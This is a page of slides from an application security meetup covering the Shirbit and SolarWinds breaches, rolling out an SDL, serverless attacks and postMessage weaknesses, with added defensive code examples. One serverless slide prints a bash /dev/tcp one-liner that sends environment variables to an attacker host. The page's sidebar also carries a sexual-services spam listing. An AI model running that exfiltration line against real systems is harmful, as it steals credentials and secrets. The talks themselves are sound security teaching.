Adobe Marketo Engage Deep Dives: Using Webhooks to Transfer DataAdobe Marketo Engage Deep Dives: Using Webhooks to Transfer Data
Adobe Marketo Engage Deep Dives: Using Webhooks to Transfer Data
 
KnowAPIs-UnknownPerf-jaxMainz-2024 (1).pptx
KnowAPIs-UnknownPerf-jaxMainz-2024 (1).pptxKnowAPIs-UnknownPerf-jaxMainz-2024 (1).pptx
KnowAPIs-UnknownPerf-jaxMainz-2024 (1).pptx
 
Unit 1.1 Excite Part 1, class 9, cbse...
Unit 1.1 Excite Part 1, class 9, cbse...Unit 1.1 Excite Part 1, class 9, cbse...
Unit 1.1 Excite Part 1, class 9, cbse...
 
Unveiling the Tech Salsa of LAMs with Janus in Real-Time Applications
Unveiling the Tech Salsa of LAMs with Janus in Real-Time ApplicationsUnveiling the Tech Salsa of LAMs with Janus in Real-Time Applications
Unveiling the Tech Salsa of LAMs with Janus in Real-Time Applications
 
Learn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdf
Learn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdfLearn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdf
Learn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdf
 
ODSC - Batch to Stream workshop - integration of Apache Spark, Cassandra, Pos...
ODSC - Batch to Stream workshop - integration of Apache Spark, Cassandra, Pos...ODSC - Batch to Stream workshop - integration of Apache Spark, Cassandra, Pos...
ODSC - Batch to Stream workshop - integration of Apache Spark, Cassandra, Pos...
 
What is Binary Language? Computer Number Systems
What is Binary Language?  Computer Number SystemsWhat is Binary Language?  Computer Number Systems
What is Binary Language? Computer Number Systems
 
HR Software Buyers Guide in 2024 - HRSoftware.com
HR Software Buyers Guide in 2024 - HRSoftware.comHR Software Buyers Guide in 2024 - HRSoftware.com
HR Software Buyers Guide in 2024 - HRSoftware.com
 
Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...
Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...
Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...
 
Alluxio Monthly Webinar | Cloud-Native Model Training on Distributed Data
Alluxio Monthly Webinar | Cloud-Native Model Training on Distributed DataAlluxio Monthly Webinar | Cloud-Native Model Training on Distributed Data
Alluxio Monthly Webinar | Cloud-Native Model Training on Distributed Data
 
chapter--4-software-project-planning.ppt
chapter--4-software-project-planning.pptchapter--4-software-project-planning.ppt
chapter--4-software-project-planning.ppt
 
Professional Resume Template for Software Developers
Professional Resume Template for Software DevelopersProfessional Resume Template for Software Developers
Professional Resume Template for Software Developers
 
Asset Management Software - Infographic
Asset Management Software - InfographicAsset Management Software - Infographic
Asset Management Software - Infographic
 
Engage Usergroup 2024 - The Good The Bad_The Ugly
Engage Usergroup 2024 - The Good The Bad_The UglyEngage Usergroup 2024 - The Good The Bad_The Ugly
Engage Usergroup 2024 - The Good The Bad_The Ugly
 
BATTLEFIELD ORM: TIPS, TACTICS AND STRATEGIES FOR CONQUERING YOUR DATABASE
BATTLEFIELD ORM: TIPS, TACTICS AND STRATEGIES FOR CONQUERING YOUR DATABASEBATTLEFIELD ORM: TIPS, TACTICS AND STRATEGIES FOR CONQUERING YOUR DATABASE
BATTLEFIELD ORM: TIPS, TACTICS AND STRATEGIES FOR CONQUERING YOUR DATABASE
 
The Essentials of Digital Experience Monitoring_ A Comprehensive Guide.pdf
The Essentials of Digital Experience Monitoring_ A Comprehensive Guide.pdfThe Essentials of Digital Experience Monitoring_ A Comprehensive Guide.pdf
The Essentials of Digital Experience Monitoring_ A Comprehensive Guide.pdf
 
cybersecurity notes for mca students for learning
cybersecurity notes for mca students for learningcybersecurity notes for mca students for learning
cybersecurity notes for mca students for learning
 
Call Girls in Naraina Delhi 💯Call Us 🔝8264348440🔝
Call Girls in Naraina Delhi 💯Call Us 🔝8264348440🔝Call Girls in Naraina Delhi 💯Call Us 🔝8264348440🔝
Call Girls in Naraina Delhi 💯Call Us 🔝8264348440🔝
 
XpertSolvers: Your Partner in Building Innovative Software Solutions
XpertSolvers: Your Partner in Building Innovative Software SolutionsXpertSolvers: Your Partner in Building Innovative Software Solutions
XpertSolvers: Your Partner in Building Innovative Software Solutions
 

Application security meetup 27012021

  • 2. Recent Cyber Security Attacks in Israel and Worldwide By Lior Mazor
  • 3. Agenda
    • 'Shirbit' Israeli Insurance Company Security Incident
      • Chain of events
      • Points of Failure – Self Evaluation
    • 'SolarWinds' global Incident
      • Incident analysis
      • Correlation – corporate and as a vendor
  • 4. ABOUT MYSELF – Lior Mazor, CISSP, CISM, CDPSE
    • Leading and Managing the S-SDLC and information product security at Amdocs
    • B.Sc. Math & Computer Science
    • Over 18 years of cybersecurity experience
    • Implementing and promoting Information Security & Cyber Awareness in various enterprise organizations across the world
    • Building Enterprise Cyber Defense Methodologies and ‘Execution Practices’
    • Expertise in Secure Development, Code Review & Application Penetration Testing
    • Certified as ISO 27001 Lead Auditor
  • 6. Shirbit Insurance Company – Short Facts
    • With regards to security, the company chose a “CISO as a Service” approach – 2 days a week
    • Established officially in 2000 and considered part of the small insurance groups in IL
    • The company has ~220 employees based in Israel
    • The company won a major IL project for insurance, hence holds significant personal data (2005)
    • The company holds a cyber security insurance policy by AON (no further details are known)
    • The company utilized an external MDR service, not working on weekends, with monitoring abilities only
  • 7. Chain Of Events
    • 29/11 – Active Incident in Place: high-level understanding of the incident by the Shirbit company begins
      1. Social media accounts on Twitter and Telegram opened with the name “Black Shadow”
      2. Darknet search for “technical writers”
    • 30/11 – Regulation Update: Shirbit notifies the regulators about a potential breach
      1. Shirbit takes down (willingly or not) its website and all other internet-connected servers/applications
      2. Examples of stolen data are leaked
    • 31/11 – Media Notification: the leakage is picked up by the media and published across different media channels
      1. Data examples continue to surface outside, showing the intention and seriousness of the hackers
    • 1-2/12 – IR kick-in: the company begins its response, from operational to technological and other factors
      1. First TXT message is sent to customers, stating a potential cyber breach
      2. The company hires external IR teams and aligns with Gov'
    • 3-4…/12 – Official Ransom Demand: Black Shadow posts its ransom demand and actively threatens to publish more data
      1. Data continues to be published
      2. Shirbit doesn’t plan to pay the ransom
      3. Data is offered for sale on the darknet
      4. Shirbit posts an FAQ and additional SMS messages are sent to customers
  • 8. Partial Facts, Speculation and Assumptions
    The details below are taken from OSINT data sources (CrowdStrike, ClearSky, general media channels).
    • The attack didn’t happen overnight – in these types of scenarios the hacker was able to gain a foothold over the past 2-4 months, then waited for a trigger or worked under the radar to achieve a significant footprint (“living off the land”).
    • What about their security solutions? Very limited: ESET AV with no advanced abilities, and their DLP software was not configured well.
    • How were they hacked? From known vulnerabilities never patched on their VPN (Pulse) to security gaps on their OWA (Outlook Web Access) that allowed the injection of a backdoor, and from there – direct access to their backup servers.
    • Hacktivist, nation-planned attack or cyber criminal – all theories apply. Some state that the group never existed before (no prior knowledge) and is an Iranian/pro-Palestinian retaliation. Some state that during negotiation it seemed to be an IL-based attack (publication of the Infosec policy and the origin of opening the Telegram group).
  • 9. Postmortem Analysis – Points of Failure, Self Evaluation!
    Evaluated across the incident-response phases (Prepare; Detect & Analyze; Contain, Eradicate & Recover; Post-incident activity) and the People / Process / Tech' axes.
    • Yet to be seen…
      1. No official government regulatory statements
      2. 4 'class actions' were already filed
      3. The company is already “back to business” and issuing new policies
    • 1. Communication to customers and support needs to be improved (minimal FAQ)
      2. Ability to evaluate the magnitude of the breach (media based)
      3. Major attempts to “pass the risk” that are not taken lightly by the public
    • 1. The company is still under active incident
      2. Some minor customer notification improvement
  • 11. 'SolarWinds' – IT Management and Monitoring Company
  • 12. 'SolarWinds' – Supply Chain Type of Attack
    • A different type of attack, not the traditional data leakage or ransomware.
    • Different actors – this type of attack usually has the characteristics of what is defined as a “nation-based attack”, not the traditional type of attacks; it’s a carefully planned attack involving aspects of espionage, with a completely different scale and impact.
    • How didn’t they find it? Requires maturity around their code, understanding of insider threat and overall security controls to learn about the potential anomaly.
    • How is this happening? A backdoor in the code in the mask of a dedicated file or feature; requires inside and internal access to the CI/CD eco-system.
    • Look for the weakest link & major footprint – supply chain attacks are different; they focus on getting a major footprint via a weak point. Any type of company that can fall under this category can be targeted.
  • 13. SolarWinds – SUPPLY CHAIN Based Attack
    • Sophisticated way of attack
    • Almost impossible to detect (if at all)
    • The attackers inserted malicious code into a DLL
    • SolarWinds Orion Platform installed
    • The backdoor activates – randomly between 12 to 14 days after installation
    • Attackers ping the backdoor – gathering and sending info
    • The backdoor runs commands from the attackers
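The dormant-then-beacon behaviour described on this slide is what a defender can look for: a management server that, days after an installation, starts contacting a destination it has never contacted before. The script below is an added example, not code from the slide deck or from SolarWinds; it builds a per-host baseline of outbound destinations from the first days after installation and flags destinations that first appear after that window. The log format, host names, domains and install dates are all constructed for the demonstration.

```python
"""Added example: flag first-seen outbound destinations that appear well after a
host's installation date. A backdoor that sleeps after install and then beacons
out shows up as exactly this kind of late "new destination" event.
Everything below (log lines, hosts, domains, install dates) is constructed."""
from datetime import datetime, timedelta

# Constructed outbound-connection log: "<ISO timestamp> <host> <destination>"
SAMPLE_LOG = """\
2020-03-01T09:00:00 orion-01 updates.example-vendor.test
2020-03-01T09:05:00 orion-01 ntp.corp.test
2020-03-02T09:00:00 orion-01 updates.example-vendor.test
2020-03-10T09:00:00 orion-01 ntp.corp.test
2020-03-14T03:12:00 orion-01 a1b2c3.first-seen-cdn.test
2020-03-15T03:12:00 orion-01 a1b2c3.first-seen-cdn.test
2020-03-15T10:00:00 fileserver-02 ntp.corp.test
"""

# Constructed install dates per host (in practice: asset or change records)
INSTALL_DATES = {
    "orion-01": datetime(2020, 3, 1),
    "fileserver-02": datetime(2020, 3, 14),
}


def parse_log(text):
    """Parse the constructed log format into (timestamp, host, destination) tuples."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, host, dest = line.split()
        events.append((datetime.fromisoformat(ts), host, dest))
    return events


def find_new_destinations(events, install_dates, baseline_days=7):
    """Return [(host, dest, first_seen_iso, days_after_install)] for every
    destination a host first contacted more than `baseline_days` after its
    installation. Destinations first seen inside the baseline window are
    treated as the host's normal profile (updates, NTP, ...)."""
    first_seen = {}
    for ts, host, dest in sorted(events):
        first_seen.setdefault((host, dest), ts)  # keep the earliest contact

    alerts = []
    for (host, dest), ts in sorted(first_seen.items(), key=lambda kv: kv[1]):
        install = install_dates.get(host)
        if install is None:
            continue  # no install record: cannot judge, skip rather than guess
        age = ts - install
        if age > timedelta(days=baseline_days):
            alerts.append((host, dest, ts.isoformat(), age.days))
    return alerts


if __name__ == "__main__":
    for host, dest, when, days in find_new_destinations(parse_log(SAMPLE_LOG), INSTALL_DATES):
        print(f"ALERT {host} first contacted {dest} at {when} ({days} days after install)")
```

The baseline window is a tuning knob: too short and every legitimate but rarely used destination becomes an alert, too long and a backdoor that beacons inside the window is baselined as normal. The value that matters is the one that fits the host's real change cadence, which is why the check is per host rather than global.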
  • 14. What can prevent SolarWinds type of attacks?
    • As a Corporate:
      • Perform SDL (Security Development Lifecycle) and change management processes
      • Map the “supply chain” and most valuable assets
      • Remove default credentials from the vendor installation playbook
      • Ensure conditional access to valuable assets
      • Enable anomaly detection systems
      • Control and audit privileged accounts
    • As a Vendor:
      • Perform SDL (Security Development Lifecycle) and change management processes
      • Secure the development eco-system (CI/CD)
      • Digitally sign artifacts (yes, still do it)
      • Peer internal review by R&D
      • Secure the overall corporate environment against rogue actors (corporate accountability)
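"Digitally sign artifacts" on the vendor side and "map the supply chain" on the corporate side meet at release verification: the consumer checks that every shipped file matches an authenticated manifest before deploying it. The script below is an added example, not code from the slide deck, SolarWinds or any vendor; it builds a SHA-256 manifest over a release, authenticates the manifest with an HMAC (a stand-in for a real asymmetric code signature such as Authenticode on a DLL, used here only so the example runs with the standard library), and then verifies a clean copy and a tampered copy. The file names, contents and key are constructed.

```python
"""Added example: manifest-based release verification. The manifest lists a
SHA-256 digest per artifact; the manifest itself is authenticated with an HMAC
(assumption: a shared key held outside the build system stands in for a
proper code-signing key). A modified or unlisted file fails verification.
All artifact names, contents and the key are constructed."""
import hashlib
import hmac
import json

# Constructed release: artifact name -> bytes (a real release would be files on disk)
RELEASE = {
    "agent-core.dll": b"MZ\x90\x00 constructed core module bytes",
    "agent-web.dll": b"MZ\x90\x00 constructed web module bytes",
}

# Constructed key; in practice the signing key never lives on the build host
SIGNING_KEY = b"constructed-demo-key-do-not-reuse"

# Constructed tampered copy: one module altered, one extra module slipped in
TAMPERED = dict(RELEASE)
TAMPERED["agent-core.dll"] = RELEASE["agent-core.dll"] + b"\x90\x90 injected"
TAMPERED["agent-helper.dll"] = b"MZ\x90\x00 constructed unlisted module"


def build_manifest(artifacts, key):
    """Produce (manifest_bytes, tag): canonical JSON of per-artifact SHA-256
    digests, plus an HMAC-SHA256 tag over those bytes."""
    digests = {name: hashlib.sha256(data).hexdigest() for name, data in artifacts.items()}
    manifest = json.dumps(digests, sort_keys=True, separators=(",", ":")).encode()
    tag = hmac.new(key, manifest, hashlib.sha256).hexdigest()
    return manifest, tag


def verify_release(artifacts, manifest, tag, key):
    """Return (ok, problems). The manifest is authenticated first: if its tag is
    wrong, the digests inside it cannot be trusted and nothing else is checked.
    Then every listed artifact must be present with the right digest, and no
    unlisted artifact may be present."""
    expected = hmac.new(key, manifest, hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected, tag):  # constant-time comparison
        return False, ["manifest authentication failed"]

    digests = json.loads(manifest)
    problems = []
    for name, digest in sorted(digests.items()):
        data = artifacts.get(name)
        if data is None:
            problems.append(f"missing: {name}")
        elif not hmac.compare_digest(hashlib.sha256(data).hexdigest(), digest):
            problems.append(f"modified: {name}")
    for name in sorted(artifacts):
        if name not in digests:
            problems.append(f"unlisted: {name}")
    return not problems, problems


if __name__ == "__main__":
    manifest, tag = build_manifest(RELEASE, SIGNING_KEY)
    print("clean release:", verify_release(RELEASE, manifest, tag, SIGNING_KEY))
    print("tampered release:", verify_release(TAMPERED, manifest, tag, SIGNING_KEY))
```

The caveat this example makes visible is the one behind the slide's "(yes, still do it)": verification only proves that the artifacts match what was signed. If the code was altered before the build, as the slide describes for a backdoor placed inside the code, a correctly signed release passes this check, which is why signing sits beside securing the CI/CD eco-system and peer review rather than replacing them.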
  • 16. How can you deliver a secure product? Michael Furman, Security Architect
  • 17. The Legend of SDL ● Steve Lipner  Senior Director of Security Engineering Strategy for Microsoft  Key person for the Microsoft SDL
  • 18. What will we cover today? What is an SDL? Why is an SDL important? Sample: Tufin SDL How can you deliver a secure product?
  • 19. About Me ● >12 years in application security ● >8 years with Tufin – Lead Security Architect ● >20 years in software engineering ● www.linkedin.com/in/furmanmichael/ ● ultimatesecpro@gmail.com ● Read my blog https://ultimatesecurity.pro/tags/presentation/ ● Follow me on twitter @ultimatesecpro ● I like to travel, read books and listen to music
  • 20. About ● Market Leader in Security Policy Automation ● Tufin is used by >2000 enterprises ◦ To segment networks and connect applications ◦ On-prem networks, firewalls, cloud and K8S ● We are the Security Policy Company!
  • 21. Journey to our SDL ● Resolving security issues? Easy for me! ● Creating a “security” process? Brand new for me! ● Soooo many things to manage ... ◦ Vulnerabilities discovered by customers ◦ CVEs ◦ Upgrading 3rd-party software ◦ Pen tests ◦ ... and all the other stuff I did not yet even know about ● Saved by the SDL! ● No need to reinvent the wheel
  • 22. What is an SDL? ● SDL is the process for developing secure software ● Adds security controls in each development phase SDL = Security Development Lifecycle
  • 23. History of SDL ● Mail of Bill Gates ◦ From: Bill Gates ◦ To: every full-time employee at Microsoft ◦ Sent: Tuesday, January 15, 2002 5:22 PM ◦ Subject: Trustworthy computing ● Microsoft shut down Windows development to handle the security issues ● Microsoft SDL ◦ v 1.0 - 2004 (internal) ◦ v 3.2 - 2008 (public) ◦ v 5.2 - 2012 (recent) … “Security: The data our software and services store on behalf of our customers should be protected from harm and used or modified only in appropriate ways. Security models should be easy for developers to understand and build into their applications.”
  • 24. Why is an SDL important? • Helps developers build secure software • Ensures security is enabled out of the box • Defines how to respond to discovered vulnerabilities
  • 25. Software Development Life Cycle (SDLC): Requirements, Design, Implementation, Verification, Release
  • 26. SDL - Shift Left: security is applied across Requirements, Design, Implementation, Verification and Release, starting from the earliest phase
  • 27. Tufin SDL ● Phases: Training, Requirements, Design, Implementation, Verification, Release, Response ● Practices: Security Classroom Sessions, Security Champions, Security Requirements, Security Design, SAST, Software Updates, Peer Reviews, Internal Security Scans, DAST, External Security Tests, Vulnerability Response Policy
  • 29. Security Training ● Security awareness training for the Development and QA teams ◦ The latest security threats, mitigations, and technologies ◦ OWASP Top 10 best practices ● Security Champions
  • 30. Security Training ● Q: How can a Security Champion be successful? ● Tip: Identify and resolve specific security issues ● Examples of investigations: ◦ Best way for us to handle Content Security Policy (CSP)? ◦ Best way for us to prevent XML External Entity (XXE) attacks? ● Tufin success: OWASP meetup lecture https://ultimatesecurity.pro/post/xxe-meetup/
  • 32. Security Requirements ● Incorporated into the requirements stage of S/W development ● Why do we want to handle security early? ◦ Allows us to design a feature and to write test plans which incorporate security requirements up front ◦ Saves time for all of us – developer time, QA time, documentation time
  • 33. Design ● Designs of new features are done jointly by both development and security teams
  • 34. Security Requirements & Design ● Q: How can you ensure Dev & QA handle security? ● Tip: Make it easy - create a security checklist ● Examples ◦ New API? • Make sure the API has proper authentication • Make sure the API has proper authorization • Implement input validation ◦ Confidential info not stored as plain text • Use appropriate encryption or hash algorithms ◦ Confidential info not stored on the client side ◦ Confidential info not sent via the HTTP GET method ◦ …
  • 36. Static Application Security Testing (SAST) ● What is SAST? ● Q: Any benefit to scan on each commit? ● Tip: Scan at least weekly ◦ Daily is the best option ● Your goal: Fix High issues immediately!
  • 37. Software Updates ● All 3rd-party software is regularly updated ● Q: Can I ensure all 3rd-party software is kept up-to-date without a tool? ◦ Open-source 3rd-party software ◦ Commercial 3rd-party software ● Tip: check that recommended upgrades don’t introduce new vulnerabilities ● Your goal: upgrade to a version without High or Critical issues!
  • 38. Peer Reviews ● Mandatory for every code change ● Tip: ensure all code changes adhere to security requirements ◦ Passwords are not stored in plain text ◦ Passwords are not stored on the client side ◦ …
  • 40. Internal Security Scans ● What are Internal Security Scans? ● Q: Any benefit to scan on each commit? ● Tip: Scan at least monthly ◦ Depends on your release cycle ● Your goal: Fix High issues immediately!
  • 41. Internal Security Scans ● Qualys SSL Labs Report – free service https://www.ssllabs.com/ssltest/ ● Tip: Ensure you check the “Do not show the results on the boards” checkbox
  • 43. Dynamic Application Security Testing (DAST) ● What is DAST? ● Q: Any benefit to scan on each commit? ● Tip: Scan at least monthly ◦ Depends on your release cycle ● Your goal: Fix High issues immediately!
  • 45. External Security Tests ● Why External Security Tests? ● Tips: ◦ Test at least annually • Best with each major release ◦ Define a valid test scope that covers all areas • WebApp • Infra ◦ Make sure the External Test is added to the R&D calendar ● Your goal: fix High issues immediately! ◦ Coordinate a retest after your fixes
  • 47. Vulnerability Response Policy • CRITICAL: A patch will be made available as soon as possible • HIGH: A fix will be included in the upcoming release • MEDIUM: A fix will be included in a future release • LOW: A fix may be included in a future release • NOT VULNERABLE: Nothing to fix
  • 48. Vulnerability Response Policy ● Define a vulnerability response policy ◦ Document it ● Tip: the policy should be approved at the corporate level ◦ It affects sales, support and development
  • 49. Rolling out an SDL ● First phase (minimal SDL) ◦ Vulnerability Response Policy ◦ Internal Security Scans • Qualys SSL Labs Report ◦ Software Updates • Using a tool ● Second phase ◦ External Security Tests ● Third phase ◦ SAST ● Fourth phase ◦ DAST
  • 50. Rolling out an SDL ● Ongoing ◦ Security Requirements & Design ◦ Security Training ◦ Security Champions ◦ Peer Reviews ● Further improvements ◦ https://www.microsoft.com/en-us/securityengineering/sdl/practices ◦ …
  • 51. Selecting a tool for any SDL phase ● Perform a POC ◦ Define the requirements very well before the POC ● Tools can be commercial or open source ● Tools from the same provider are not essential
  • 52. How can you deliver a secure product? ● Start to roll out an SDL in your organization ● Improve SDL on a regular basis
  • 53. Take Aways SDL - the framework that ensures secure software Roll out an SDL ... And follow it!!! You will deliver a secure product!
  • 56. About Me Name Yossi Shenhav Experience CEO, Komodo Consulting Projects ctf.komodosec.com www.hacktale.com Spotlight.komodosec.com
  • 67. Code Execution Vulnerability XXE Unsafe deserialization Unsafe file opening Unsafe use of eval Vulnerable libraries
  • 68. DEPENDS ON TIMEOUT FOR OUR EXECUTION
  • 69. THE DEFAULT AWS SETTING IS 3 SECONDS
  • 72. IS IT A DEAD END?
  • 73. Application layer vulnerabilities (bad code) SQL Injection Authorization Authentication XSS and more
  • 77. PLEASE SEND YOUR ENVIRONMENT VARIABLES TO US exec 3<>/dev/tcp/<IP Address>/<port> echo "$(printenv)" 1>&3 "$(cat <&3)"
  • 79. Conclusion Application level vulnerabilities are here to stay – write secure code. Misconfiguration of permissions in a serverless application may result in attackers taking over the entire cloud environment. Serverless architecture provides improved security over traditional web architecture.
  • 82. Enso.security Agenda Cross-document messaging Threat and attack models The missing tool Example Takeaways
  • 83. Exploiting cross-document messaging. Chen Gour-Arie, Chief Architect, Enso Security. Have been breaking & building all sorts of applications since 2004. Application Security Virtual Meetup 2021, live in Tel Aviv, Israel
  • 85. Cross document messaging: a window-to-window communication channel. No network: everything happens in the browser’s memory. Simple security model. The Window interface represents a window containing a DOM document; the document property points to the DOM document loaded in that window.
  • 86. Cross document messaging, functional flow: any window in the document hierarchy can send a message to any other document; the “message” event is triggered on the receiving window. (Diagram: sender window, sender document, sender script on one side; receiver window, receiver document, receiver script on the other.)
  • 87. Cross document messaging, security model (diagram: sender code, receiver window, receiver code) ● Sender code must specify the remote origin* ● Received messages include info about the sender origin; the developer must authorize the call ● Origin settings can tell a window not to load in risky scenarios: Cross-Origin-Opener-Policy**, Cross-Origin-Embedder-Policy**, X-Frame-Options ● Guided usage. * Wildcards can be used. ** Limited browser support.
  • 89. Cross-document messaging: STRIDE (diagram: sender script, sender document, window; receiver document, receiver script) ● Spoofing: senders aren't who we think they are ● Spoofing: the recipients aren't who we think they are ● Tampering ● Information Disclosure ● Denial of Service ● Elevation of Privileges
  • 90. Cross-document messaging: Attack Model 1 (diagram: receiver window, receiver document, receiver script; malicious sender window, sender script) ● Weakness: the window may not restrict its opener ● Weakness: developers can send unrestrictedly
  • 91. Cross-document messaging: Attack Model 2 (diagram: malicious sender window, sender document, sender script; receiver window, receiver script) ● Weakness: the window may not restrict its opener ● Weakness: developers may skip the authorization check ● A malicious page opens the victim page and sends messages to it
  • 93. The missing tool should be able to: ● Find senders ● Find receivers ● Simulate a malicious sender ● Simulate a malicious receiver
  • 94. Enso.security Posta - open source tool at benso.io
  • 98. Conclusion Cross document messaging weaknesses are: ● By default, windows can send data to each other ● On the receiver script, there is no default authorization check ● Sender scripts can publish data without restricting the recipient To avoid these, we must spot implementations and test them!
  • 99. Conclusion For engineers: safe use of cross document messaging ● Use XFO/Cross-Origin policies to avoid talking to unwanted origins ● Send to explicit targets only, as in postMessage(message, [explicit target origin]) ● When handling messages, always check event.origin, but beware of regex bypass techniques
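The three engineering rules above, shown as an added example that is not from the Enso talk and not the Posta tool: an exact-match origin allow-list on the receiver, a prefix-style regex check of the kind the slide warns about so its bypass is visible side by side, and a sender wrapper that refuses the “*” wildcard. The origins are constructed, and the handler is exercised with plain event-like objects so it runs in Node without a browser.

```javascript
// Added example (not from the talk or the Posta tool): receiver-side origin
// allow-listing and sender-side explicit targeting for window.postMessage.
// Origins are constructed; events are plain objects shaped like MessageEvent.
const TRUSTED_ORIGINS = new Set(['https://app.example.test', 'https://admin.example.test']);

// Exact-match allow-list: the check that survives look-alike origins.
function isTrustedOrigin(origin) {
  return TRUSTED_ORIGINS.has(origin);
}

// The bypass-prone pattern the slide warns about: a regex anchored only at the
// start matches any attacker host that begins with the trusted origin.
const LOOSE_RE = /^https:\/\/app\.example\.test/;
function looseOriginCheck(origin) {
  return LOOSE_RE.test(origin);
}

// Receiver: returns a "message" handler that drops messages from untrusted
// origins and validates the message shape before anything acts on it.
// `act(data, origin)` only ever sees trusted, well-formed messages.
function makeMessageHandler(act) {
  return function onMessage(event) {
    if (!isTrustedOrigin(event.origin)) {
      return { handled: false, reason: 'untrusted origin' };
    }
    const data = event.data;
    if (!data || typeof data !== 'object' || typeof data.type !== 'string') {
      return { handled: false, reason: 'malformed message' };
    }
    return { handled: true, result: act(data, event.origin) };
  };
}

// Sender: refuses the "*" wildcard and unknown targets, so data reaches only
// the origin it was meant for even if the window was navigated elsewhere.
function postToTarget(targetWindow, message, targetOrigin) {
  if (targetOrigin === '*' || !isTrustedOrigin(targetOrigin)) {
    throw new Error(`refusing to post to ${targetOrigin}`);
  }
  targetWindow.postMessage(message, targetOrigin);
}

// Browser wiring would be: window.addEventListener('message', makeMessageHandler(act));
```

Both halves have to be present: an exact origin check on the receiver does nothing for data the sender already leaked with a wildcard target, and an explicit target does nothing for a receiver that acts on whatever arrives.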
  • 100. Research is always better with friends! Omer Yaron, Wix.com; Barak Tawily, CTO, Enso Security
  • 101. Enso Application Security Posture Management ● Discover: autonomous application asset discovery ● Calibrate: correlate data about assets and their application security controls, backlogs, teams, projects and technology to measure risk posture ● Manage: rule-based policy to continuously prescribe requirements, adaptive controls, and benchmarks to assets. Thank you!